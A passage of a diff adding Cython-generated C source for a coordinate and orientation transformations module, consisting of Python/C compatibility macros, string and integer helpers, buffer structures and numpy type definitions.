(res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__common__transformations__transformations +#define __PYX_HAVE_API__common__transformations__transformations +/* Early includes */ +#include "orientation.cc" +#include "orientation.hpp" +#include "coordinates.cc" +#include "coordinates.hpp" +#include +#include + + /* Using NumPy API declarations from "numpy/__init__.cython-30.pxd" */ + +#include "numpy/arrayobject.h" +#include "numpy/ndarrayobject.h" +#include "numpy/ndarraytypes.h" +#include "numpy/arrayscalars.h" +#include "numpy/ufuncobject.h" +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* Header.proto */ +#if !defined(CYTHON_CCOMPLEX) + #if defined(__cplusplus) + #define CYTHON_CCOMPLEX 1 + #elif (defined(_Complex_I) && !defined(_MSC_VER)) || ((defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_COMPLEX__)) + #define CYTHON_CCOMPLEX 1 + #else + #define CYTHON_CCOMPLEX 0 + #endif +#endif +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #include + #else + #include + #endif +#endif +#if CYTHON_CCOMPLEX && !defined(__cplusplus) && defined(__sun__) && defined(__GNUC__) + #undef _Complex_I + #define _Complex_I 1.0fj +#endif + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "common/transformations/transformations.pyx", + "", + "__init__.cython-30.pxd", + "type.pxd", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* BufferFormatStructs.proto */ +struct __Pyx_StructField_; +#define __PYX_BUF_FLAGS_PACKED_STRUCT (1 << 0) +typedef struct { + const char* name; + struct __Pyx_StructField_* fields; + size_t size; + size_t arraysize[8]; + int ndim; + char typegroup; + char is_unsigned; + int flags; +} __Pyx_TypeInfo; +typedef struct __Pyx_StructField_ { + __Pyx_TypeInfo* type; + const char* name; + size_t offset; +} __Pyx_StructField; +typedef struct { + __Pyx_StructField* field; + size_t parent_offset; +} __Pyx_BufFmt_StackElem; +typedef struct { + __Pyx_StructField root; + __Pyx_BufFmt_StackElem* head; + size_t fmt_offset; + size_t new_count, enc_count; + size_t struct_alignment; + int is_complex; + char enc_type; + char new_packmode; + char enc_packmode; + char is_valid_array; +} __Pyx_BufFmt_Context; + +/* #### Code section: numeric_typedefs ### */ + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":731 + * # in Cython to enable them only on the right systems. + * + * ctypedef npy_int8 int8_t # <<<<<<<<<<<<<< + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + */ +typedef npy_int8 __pyx_t_5numpy_int8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":732 + * + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t # <<<<<<<<<<<<<< + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t + */ +typedef npy_int16 __pyx_t_5numpy_int16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":733 + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t # <<<<<<<<<<<<<< + * ctypedef npy_int64 int64_t + * #ctypedef npy_int96 int96_t + */ +typedef npy_int32 __pyx_t_5numpy_int32_t; 